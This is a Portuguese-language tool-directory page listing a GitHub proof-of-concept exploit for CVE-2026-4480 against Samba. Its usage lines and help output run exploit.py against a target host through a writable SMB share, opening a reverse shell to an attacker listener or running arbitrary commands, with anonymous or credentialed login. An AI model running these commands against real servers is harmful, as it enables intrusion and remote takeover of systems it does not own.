Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-4480-exploit-poc — Este é um PoC de exploit para CVE-2026-4480 | Kitploit
Ferramentas/GitHubGitHub/vusal777/cve-2026-4480-exploit-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubvusal777/cve-2026-4480-exploit-poc

CVE-2026-4480-exploit-poc

Este é um PoC de exploit para CVE-2026-4480

Ver Repositório
1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Usage:

Para login anônimo:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -N (it is for anonymous login)

Login via credenciais:

python3 exploit.py --lhost <listenerhost> --lport <listenerport> -t <target> -u <username> -p <password>

root@kitploit:~
[!] Error: the following arguments are required: -s/--sharename
[*] Note: if user is anonymous and no password, then just add -N without -u or -p

##### Usage:
exploit.py [-h] -t TARGET -Lh LHOST -Lp LPORT -s SHARENAME [-c CMD] (-N | -u USERNAME) [-p PASSWORD]
options:
-h, --help            show this help message and exit
-t, --target TARGET   target Samba host/IP (rhost)
-Lh, --lhost LHOST    your listener IP (e.g. tun0)
-Lp, --lport LPORT    your listener port
-s, --sharename SHARENAME (Writable SMB share / printer name)
-c, --cmd CMD         run a specific shell command instead of a reverse shell
-N, --no-pass         Anonymous / guest login
-u, --username USERNAME (Username for authentication)
-p, --password PASSWORD (Password for authentication)```
Baixar ferramenta